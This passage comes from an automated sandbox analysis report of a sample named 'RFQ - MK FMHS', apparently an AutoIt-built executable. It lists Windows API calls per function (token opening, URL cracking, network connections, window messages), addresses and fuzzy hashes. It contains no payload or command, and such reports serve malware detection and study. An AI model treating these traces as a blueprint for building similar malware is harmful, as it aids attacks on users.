                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CriticalSection_memset$EnterLeave_memmove
                    • String ID:
                    • API String ID: 48991266-0
                    • Opcode ID: 400254ced4662adef490ad8933421cf7d5e96d76aa45d0d696cb5ba667e8e46e
                    • Instruction ID: 71a6749e3f7c9f614699f36f4ca1e224e4eca9ba85cffa5621ba1eb93d4e5310
                    • Opcode Fuzzy Hash: 400254ced4662adef490ad8933421cf7d5e96d76aa45d0d696cb5ba667e8e46e
                    • Instruction Fuzzy Hash: CEF0543A100200AFCF016F55DC85A99BB69EF85320B049065FE086E22AC731E951CBB4
                    APIs
                      • Part of subcall function 00E712F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E7134D
                      • Part of subcall function 00E712F3: SelectObject.GDI32(?,00000000), ref: 00E7135C
                      • Part of subcall function 00E712F3: BeginPath.GDI32(?), ref: 00E71373
                      • Part of subcall function 00E712F3: SelectObject.GDI32(?,00000000), ref: 00E7139C
                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00EFC030
                    • LineTo.GDI32(00000000,?,?), ref: 00EFC03D
                    • EndPath.GDI32(00000000), ref: 00EFC04D
                    • StrokePath.GDI32(00000000), ref: 00EFC05B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                    • String ID:
                    • API String ID: 1539411459-0
                    • Opcode ID: 067080e373d2dda4dd74a43ca16e2739d59c292570f22ec22b4bed89881c574e
                    • Instruction ID: 095ee8933b9f40b772688442ce9267ab39932069e925b0bf164f9cd0c220fc92
                    • Opcode Fuzzy Hash: 067080e373d2dda4dd74a43ca16e2739d59c292570f22ec22b4bed89881c574e
                    • Instruction Fuzzy Hash: 5DF0BE3100125DBBDB122F55AC09FEE3F99AF0A320F148000FB11710E28B750555EB99
                    APIs
                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ECA399
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00ECA3AC
                    • GetCurrentThreadId.KERNEL32 ref: 00ECA3B3
                    • AttachThreadInput.USER32(00000000), ref: 00ECA3BA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                    • String ID:
                    • API String ID: 2710830443-0
                    • Opcode ID: b0dbd144709f24fdbfd173297f1b03fa27852bef429e98a94b8908804bd8c79d
                    • Instruction ID: dd050fefc485faeb8427f8ef12ad636959e578423c35f88b5a904dbf8f510812
                    • Opcode Fuzzy Hash: b0dbd144709f24fdbfd173297f1b03fa27852bef429e98a94b8908804bd8c79d
                    • Instruction Fuzzy Hash: 2AE01571541268BADB201FA2DD0CFEB3E1CEF167A5F048038F909E80A0CA72C955CBE0
                    APIs
                    • GetSysColor.USER32(00000008), ref: 00E72231
                    • SetTextColor.GDI32(?,000000FF), ref: 00E7223B
                    • SetBkMode.GDI32(?,00000001), ref: 00E72250
                    • GetStockObject.GDI32(00000005), ref: 00E72258
                    • GetWindowDC.USER32(?,00000000), ref: 00EAC0D3
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00EAC0E0
                    • GetPixel.GDI32(00000000,?,00000000), ref: 00EAC0F9
                    • GetPixel.GDI32(00000000,00000000,?), ref: 00EAC112
                    • GetPixel.GDI32(00000000,?,?), ref: 00EAC132
                    • ReleaseDC.USER32(?,00000000), ref: 00EAC13D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                    • String ID:
                    • API String ID: 1946975507-0
                    • Opcode ID: 3ee9f22eb5cda2ffed2c37619824c9145cdb074c69be8ab7b911775504d32b39
                    • Instruction ID: cdc4b5e56def674db474657b274982c9e370e0f31661e06d79e4ea5e20999832
                    • Opcode Fuzzy Hash: 3ee9f22eb5cda2ffed2c37619824c9145cdb074c69be8ab7b911775504d32b39
                    • Instruction Fuzzy Hash: 10E06D32200244EEDF215FB5FC4D7E83B24EF5633AF108366FA69680E287724994DB12
                    APIs
                    • GetCurrentThread.KERNEL32 ref: 00EC8C63
                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,00EC882E), ref: 00EC8C6A
                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00EC882E), ref: 00EC8C77
                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,00EC882E), ref: 00EC8C7E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CurrentOpenProcessThreadToken
                    • String ID:
                    • API String ID: 3974789173-0
                    • Opcode ID: 36f1bf7b3b92d47138f8f1c91134d3b16e3ee0e54a39439820d23083064ed173
                    • Instruction ID: 17ed5b796be43e08cf8af2d09abe57323313c47e1d2d53e8d06973e80250d6bc
                    • Opcode Fuzzy Hash: 36f1bf7b3b92d47138f8f1c91134d3b16e3ee0e54a39439820d23083064ed173
                    • Instruction Fuzzy Hash: 68E04F366423119FD7205FB26F0CF667BA8AF90796F094838E245E9050DE35844ACB61
                    APIs
                    • GetDesktopWindow.USER32 ref: 00EB2187
                    • GetDC.USER32(00000000), ref: 00EB2191
                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00EB21B1
                    • ReleaseDC.USER32(?), ref: 00EB21D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CapsDesktopDeviceReleaseWindow
                    • String ID:
                    • API String ID: 2889604237-0
                    • Opcode ID: 96c7a1f2c4d93123a5b09c6bc0ef093a801ce28a060d28dd282c10513dd2741e
                    • Instruction ID: cca3e0d9e271398c9f2f013c4fdbd4f189729166812027341e82e0ac667a93e4
                    • Opcode Fuzzy Hash: 96c7a1f2c4d93123a5b09c6bc0ef093a801ce28a060d28dd282c10513dd2741e
                    • Instruction Fuzzy Hash: B3E0C275800204AFDF019F61C848AAD7BB5AF88350F118429E95AE6220CB388145DF80
                    APIs
                    • GetDesktopWindow.USER32 ref: 00EB219B
                    • GetDC.USER32(00000000), ref: 00EB21A5
                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00EB21B1
                    • ReleaseDC.USER32(?), ref: 00EB21D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CapsDesktopDeviceReleaseWindow
                    • String ID:
                    • API String ID: 2889604237-0
                    • Opcode ID: ff9112df8721b5425a2b718dadd9dfc24416e1f66251e8157487e78256d8c9ca
                    • Instruction ID: ce2808d9d70f8783e4ccb0abb7033264b377b5faeb433a9367035784a5d66cdd
                    • Opcode Fuzzy Hash: ff9112df8721b5425a2b718dadd9dfc24416e1f66251e8157487e78256d8c9ca
                    • Instruction Fuzzy Hash: 63E0EEB5800204AFCF019FB2C8486AD7BF5AF8C310F128029F95AE7220CF389145DF80
                    APIs
                    • OleSetContainedObject.OLE32(?,00000001), ref: 00ECB981
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ContainedObject
                    • String ID: AutoIt3GUI$Container
                    • API String ID: 3565006973-3941886329
                    • Opcode ID: c294a784bc8affa378085ea174f794ed7ecd5ddcb94271e703f19088dfd12d5c
                    • Instruction ID: 1e94a1c234f6fe89456cfb1d47069a8d78deb2ebb3978e98db7afbe75d4a4e42
                    • Opcode Fuzzy Hash: c294a784bc8affa378085ea174f794ed7ecd5ddcb94271e703f19088dfd12d5c
                    • Instruction Fuzzy Hash: 9F915A71600601AFDB24DF28C985F6ABBE8FF48710F14956EF94AEB291DB71E841CB50
                    APIs
                      • Part of subcall function 00E8FEC6: _wcscpy.LIBCMT ref: 00E8FEE9
                      • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                      • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                    • __wcsnicmp.LIBCMT ref: 00EDB298
                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00EDB361
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                    • String ID: LPT
                    • API String ID: 3222508074-1350329615
                    • Opcode ID: f46e34f36184e70963a222ca14a5577bcedac70d2a2a53092d9e7d82b5dce75a
                    • Instruction ID: 3a465a682ce924f0aae2fead25a332bc6df60407a4938054f53c5dfb7688179a
                    • Opcode Fuzzy Hash: f46e34f36184e70963a222ca14a5577bcedac70d2a2a53092d9e7d82b5dce75a
                    • Instruction Fuzzy Hash: 6F615E75A00215EFCB14DB94C881EAEB7F4EF48310F15916AF54ABB391EB70AE41DB50
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID: Oa
                    • API String ID: 4104443479-3945284152
                    • Opcode ID: b933f1dc5721b4631f065087ca5058abef2760ad5f60ea6215085c4097f8e8fb
                    • Instruction ID: cd13455c1ba5d1998a2df710f057b9266b69cbb102215f9f28376e6e0e65c6be
                    • Opcode Fuzzy Hash: b933f1dc5721b4631f065087ca5058abef2760ad5f60ea6215085c4097f8e8fb
                    • Instruction Fuzzy Hash: 5C5150B0900609DFCB64CF68C580AEEB7F5FF44308F14956AE85AE7350EB31A955CB51
                    APIs
                    • Sleep.KERNEL32(00000000), ref: 00E82AC8
                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00E82AE1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: GlobalMemorySleepStatus
                    • String ID: @
                    • API String ID: 2783356886-2766056989
                    • Opcode ID: 53679ec3bb38b58cc40ddcd53a09f076142facb2637f636e2bf1700a6a98326a
                    • Instruction ID: 7e9f6451bef91ecded9a0bfb425c6bd3d82aecc688d7d6fe6de95767280c25d5
                    • Opcode Fuzzy Hash: 53679ec3bb38b58cc40ddcd53a09f076142facb2637f636e2bf1700a6a98326a
                    • Instruction Fuzzy Hash: 7C5137714187489BD320AF10D886BAFBBF8FFC5314F42885DF1D9611A6DB309929CB66
                    APIs
                      • Part of subcall function 00E7506B: __fread_nolock.LIBCMT ref: 00E75089
                    • _wcscmp.LIBCMT ref: 00ED9AAE
                    • _wcscmp.LIBCMT ref: 00ED9AC1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _wcscmp$__fread_nolock
                    • String ID: FILE
                    • API String ID: 4029003684-3121273764
                    • Opcode ID: 84398cb278c937ccf4ad75c87c856a4af1e16875cf850a7b03f7c2e9520847cf
                    • Instruction ID: 6474c8aa1021ab8394e145a084bd3872ae129af9638e291acfb153f11e08b0ef
                    • Opcode Fuzzy Hash: 84398cb278c937ccf4ad75c87c856a4af1e16875cf850a7b03f7c2e9520847cf
                    • Instruction Fuzzy Hash: 1341F672A00619BADF209AA0DC85FEFBBFDDF45714F01406BB904B7281DAB19E0587A1
                    APIs
                    • _memset.LIBCMT ref: 00EE2892
                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00EE28C8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CrackInternet_memset
                    • String ID: |
                    • API String ID: 1413715105-2343686810
                    • Opcode ID: 66a5bd139204a22eae2abd7f69f4c7adc54faee2afd03109d5957d65935db42d
                    • Instruction ID: b6afdc7c3754e9335396d686871fe5bd7a297c526fa98d857aee77a3d827c37f
                    • Opcode Fuzzy Hash: 66a5bd139204a22eae2abd7f69f4c7adc54faee2afd03109d5957d65935db42d
                    • Instruction Fuzzy Hash: 49311871800119AFDF05EFA1CC85EEEBFB9FF08300F105029E959B6166DA325A56DBA0
                    APIs
                    • DestroyWindow.USER32(?,?,?,?), ref: 00EF6D86
                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00EF6DC2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Window$DestroyMove
                    • String ID: static
                    • API String ID: 2139405536-2160076837
                    • Opcode ID: 2f3884e23dc74f3605087a11910b9bbb1d329492c20fb76af078113eea816bd5
                    • Instruction ID: 0c7cc15cb97c4f0a2b7f70309640ed7501b5792257649eed7e82b68544576dba
                    • Opcode Fuzzy Hash: 2f3884e23dc74f3605087a11910b9bbb1d329492c20fb76af078113eea816bd5
                    • Instruction Fuzzy Hash: 65315071210608AFDB109F74CC40AFB77B9FF88764F10A519FA99A7190DB71AC51DB60
                    APIs
                    • _memset.LIBCMT ref: 00ED2E00
                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00ED2E3B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    • Opcode ID: 46fe59c542dfb61d0858ce834d73b7ca723b0464022d499b784962b18b614366
                    • Instruction ID: f81f62eae11ed4fcdeedce57fdd7146d0ee9601563f74afc63e17708b9f0835a
                    • Opcode Fuzzy Hash: 46fe59c542dfb61d0858ce834d73b7ca723b0464022d499b784962b18b614366
                    • Instruction Fuzzy Hash: DA312731600305ABEB268F58C8447AEBBF5EF15354F14142FEE81F72A1D7709942CB50
                    APIs
                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00EF69D0
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EF69DB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: Combobox
                    • API String ID: 3850602802-2096851135
                    • Opcode ID: 678b2feca76aa4e95a5142433e39e4f148819211b8df88a3aa5dd7343d657a6d
                    • Instruction ID: c3fe5a44111553e85fb7ccd59609183264be7864207b50a9979b09dec2025b1a
                    • Opcode Fuzzy Hash: 678b2feca76aa4e95a5142433e39e4f148819211b8df88a3aa5dd7343d657a6d
                    • Instruction Fuzzy Hash: 4E11B67160020C7FEF119F14CC80EBB37AAEBC93A8F115124FA58AB290D6B1DC5187A0
                    APIs
                      • Part of subcall function 00E71D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E71D73
                      • Part of subcall function 00E71D35: GetStockObject.GDI32(00000011), ref: 00E71D87
                      • Part of subcall function 00E71D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E71D91
                    • GetWindowRect.USER32(00000000,?), ref: 00EF6EE0
                    • GetSysColor.USER32(00000012), ref: 00EF6EFA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                    • String ID: static
                    • API String ID: 1983116058-2160076837
                    • Opcode ID: fd12aa6c7783ff9095c7a827131918af55c263b9ee783f9dc433dafe6413003d
                    • Instruction ID: fd2de6a6369f235071cf17418216fec1c374b2507239ac50c3e669a2b3521250
                    • Opcode Fuzzy Hash: fd12aa6c7783ff9095c7a827131918af55c263b9ee783f9dc433dafe6413003d
                    • Instruction Fuzzy Hash: 78212972610209AFDB04DFA8DD45AFA7BB8FB48314F005629FE55E3250E734E861DB50
                    APIs
                    • GetWindowTextLengthW.USER32(00000000), ref: 00EF6C11
                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00EF6C20
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: LengthMessageSendTextWindow
                    • String ID: edit
                    • API String ID: 2978978980-2167791130
                    • Opcode ID: 8f93d55676d8dddae9170baddc2beeea7b99bb23345b3525c3fd95a3a04f0919
                    • Instruction ID: 95fbce8e84aa454fbdb88543650fc3658f5ab21361a62fe7ff98fcefb6a120aa
                    • Opcode Fuzzy Hash: 8f93d55676d8dddae9170baddc2beeea7b99bb23345b3525c3fd95a3a04f0919
                    • Instruction Fuzzy Hash: 24116A7150020CABEB108F64DC45AFA3BAAEF54378F605724FAA5E71E0C775DC91AB60
                    APIs
                    • _memset.LIBCMT ref: 00ED2F11
                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00ED2F30
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    • Opcode ID: 3a3b7cab45234a7401965f4a4c35208b374b4082c37554e9436fd9885280a8e5
                    • Instruction ID: eaf9d8e0cf83a94cbb92b4a4c3600371f282064636a68796521fc144b338a521
